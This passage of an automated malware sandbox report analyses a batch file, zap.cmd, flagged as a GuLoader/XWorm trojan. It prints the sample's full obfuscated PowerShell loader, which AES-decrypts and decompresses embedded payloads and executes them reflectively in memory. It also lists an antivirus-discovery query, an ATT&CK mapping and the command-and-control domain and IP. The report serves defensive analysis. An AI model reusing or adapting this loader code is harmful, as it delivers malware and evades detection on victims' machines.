6).substring(2))));[system.reflection.assembly]::($cmiy[1])([byte[]]$dchss).($cmiy[10]).($cmiy[6])($null,$null);[system.reflection.assembly]::($cmiy[1])([byte[]]$zfldv).($cmiy[10]).($cmiy[6])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\zap.cmd';$cmiy='reazbiwdzbiwlzbiwinzbiweszbiw'.replace('zbiw', ''),'lxpsboadxpsb'.replace('xpsb', ''),'cxfxwopxfxwytxfxwoxfxw'.replace('xfxw', ''),'chszniaszninsznigsznieexszniteszninsznisisznionszni'.replace('szni', ''),'decehezompehezrehezeehezssehez'.replace('ehez', ''),'elefriumenfriutfriuafriutfriu'.replace('friu', ''),'inwxpbvowxpbkwxpbewxpb'.replace('wxpb', ''),'geazgitcazgiurazgirenazgitazgipazgirocazgiessazgi'.replace('azgi', ''),'swavzpwavzliwavztwavz'.replace('wavz', ''),'trqrjdaqrjdnsqrjdfqrjdorqrjdmfiqrjdnqrjdaqrjdlqrjdbqrjdlqrjdoqrjdckqrjd'.replace('qrjd', ''),'eqbeyntqbeyrqbeyypqbeyoiqbeyntqbey'.replace('qbey', ''),'cfrrurefrruatfrruedfrruecrfrruyptfrruorfrru'.replace('frru', ''),'frostbembastbese6stbe4sstbetrstbeinstbegstbe'.replace('stbe', ''),'mlfllailfllnmlfllolflldlfllullfllelfll'.replace('lfll', '');powershell -w hidden;function iadmu($qwytb){$xhhyf=[system.security.cryptography.aes]::create();$xhhyf.mode=[system.security.cryptography.ciphermode]::cbc;$xhhyf.padding=[system.security.cryptography.paddingmode]::pkcs7;$xhhyf.key=[system.convert]::($cmiy[12])('tgqijckwwzqazylw/tfv+eer7szcl8pbscaalmr+5qk=');$xhhyf.iv=[system.convert]::($cmiy[12])('psyoatgwmebeiokwbsve0g==');$dsrrz=$xhhyf.($cmiy[11])();$quqau=$dsrrz.($cmiy[9])($qwytb,0,$qwytb.length);$dsrrz.dispose();$xhhyf.dispose();$quqau;}function xbiys($qwytb){$usnme=new-object system.io.memorystream(,$qwytb);$clidx=new-object system.io.memorystream;$gftqg=new-object system.io.compression.gzipstream($usnme,[io.compression.compressionmode]::($cmiy[4]));$gftqg.($cmiy[2])($clidx);$gftqg.dispose();$usnme.dispose();$clidx.dispose();$clidx.toarray();}$umafe=[system.io.file]::($cmiy[0])([console]::title);$zfldv=xbiys (iadmu ([convert]::($cmiy[12])([system.linq.enumerable]::($cmiy[5])($umafe, 5).substring(2))));$dchss=xbiys (iadmu ([convert]::($cmiy[12])([system.linq.enumerable]::($cmiy[5])($umafe, 6).substring(2))));[system.reflection.assembly]::($cmiy[1])([byte[]]$dchss).($cmiy[10]).($cmiy[6])($null,$null);[system.reflection.assembly]::($cmiy[1])([byte[]]$zfldv).($cmiy[10]).($cmiy[6])($null,$null); "			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	241 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	241 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zap.cmd	11%	ReversingLabs	Script-BAT.Trojan.Alien

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hjxwrm5.duckdns.org	12.202.180.134	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1255405445.000001A8D7ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E78C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.1255405445.000001A8D929A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.1255405445.000001A8D929A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000009.00000002.1255405445.000001A8D8642000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1255405445.000001A8D9410000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D79E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E78C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000009.00000002.1255405445.000001A8D7701000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.1255405445.000001A8D7701000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.1255405445.000001A8D929A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
12.202.180.134	hjxwrm5.duckdns.org	United States		22983	FISERV-INCUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446782
Start date and time:	2024-05-23 21:05:00 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zap.cmd
Detection:	MAL
Classification:	mal88.troj.evad.winCMD@17/11@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 60% Number of executed functions: 5 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .cmd Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: zap.cmd

Simulations

Behavior and APIs

Time	Type	Description
15:05:53	API Interceptor	4271465x Sleep call for process: powershell.exe modified
16:31:31	API Interceptor	1x Sleep call for process: wermgr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
12.202.180.134	update.cmd	Get hash	malicious	Unknown	Browse
	xff.cmd	Get hash	malicious	AsyncRAT, GuLoader	Browse
	new.cmd	Get hash	malicious	GuLoader	Browse
	las.cmd	Get hash	malicious	GuLoader	Browse
	kam.cmd	Get hash	malicious	Unknown	Browse
	sample.cmd	Get hash	malicious	Unknown	Browse
	zap.cmd	Get hash	malicious	GuLoader, XWorm	Browse
	xff.cmd	Get hash	malicious	Unknown	Browse
	xff.cmd	Get hash	malicious	AsyncRAT, GuLoader	Browse
	las.cmd	Get hash	malicious	GuLoader, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
hjxwrm5.duckdns.org	xff.cmd	Get hash	malicious	Unknown	Browse	87.121.105.4
hjxwrm5.duckdns.org	update.vbs	Get hash	malicious	XWorm	Browse	87.121.105.4

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FISERV-INCUS	update.cmd	Get hash	malicious	Unknown	Browse	12.202.180.134
	xff.cmd	Get hash	malicious	AsyncRAT, GuLoader	Browse	12.202.180.134
	new.cmd	Get hash	malicious	GuLoader	Browse	12.202.180.134
	las.cmd	Get hash	malicious	GuLoader	Browse	12.202.180.134
	kam.cmd	Get hash	malicious	Unknown	Browse	12.202.180.134
	sample.cmd	Get hash	malicious	Unknown	Browse	12.202.180.134
	zap.cmd	Get hash	malicious	GuLoader, XWorm	Browse	12.202.180.134
	xff.cmd	Get hash	malicious	Unknown	Browse	12.202.180.134
	xff.cmd	Get hash	malicious	AsyncRAT, GuLoader	Browse	12.202.180.134
	las.cmd	Get hash	malicious	GuLoader, XWorm	Browse	12.202.180.134

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_314e1f70-3e91-4a95-b30f-9d6ce19559ac\Report.wer

Download File

Process:	C:\Windows\System32\wermgr.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.518981092568239
Encrypted:	false
SSDEEP:	96:GeFIEjibrxYid9RH3Uje0eu/RoJV1QXIGZAX/d5FMT2SlPkpXmTA5f/VXT5NHBj2:ZyWibmG9R30h/AzuiFRZ24lO8E
MD5:	E97B0D0DE6975188F0DB1728F5A4C2D5
SHA1:	86FA425C2D6BA5BEBCAEBC04549719343594FE78
SHA-256:	A73144C1828BCAD0767A06D3DA94C90AC8C45299C3C4234E24424CB215DC3742
SHA-512:	FB6483335CF65138DC8A5306B337936E2683805064717C9D8D98970FA2DBE3B75889581A4DC67259F47C41663C7491250F8A89D391C46926066D0D861AA5BD0A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.6.9.6.8.7.6.5.1.4.8.2.4.4.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.9.8.7.8.3.8.4.7.7.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.4.e.1.f.7.0.-.3.e.9.1.-.4.a.9.5.-.b.3.0.f.-.9.d.6.c.e.1.9.5.5.9.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.e.4.-.0.0.0.1.-.0.0.1.4.-.1.5.8.b.-.1.a.3.b.4.4.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1056.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\wermgr.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7204
Entropy (8bit):	3.6860185325388644
Encrypted:	false
SSDEEP:	192:R6l7wVeJRR+FrI6Yio87kGgmftWNp2QEm:R6lXJOFrI6YdKgmftWSi
MD5:	A2692DB793278F02277CC884843AC7B1
SHA1:	05D163759C6D9D1E1AF7DD24C55B75685F04D160
SHA-256:	614C9CD148E85C12ED6888C35830B28E61A8454BBD5B5BB5DD24FED2C0013274
SHA-512:	57A1237DC044202B231DF312035C155AFEE44652DA80211A5C385DDFBA8A85E955A8B02817BA1A994884FB30CB4D49762BA8DC1E0C50CBAB95C47F2D6E4C2738
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1096.tmp.xml

Download File

Process:	C:\Windows\System32\wermgr.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4691
Entropy (8bit):	4.509987535117089
Encrypted:	false
SSDEEP:	96:uIjfCI7T67VNJFKlEFBfFtWTXFBfF5ufGd:uIeYT6714hjuf8
MD5:	4EE48D0A53A2539EAA0D3316EB743070
SHA1:	21CDAA313AB64F061E4AB9A2F0D764EC9406F3A5
SHA-256:	2279FF3C194D2F98372F7CCAE0C8E0FF31CB2F4DA4BA4543AEFD4C58462594BD
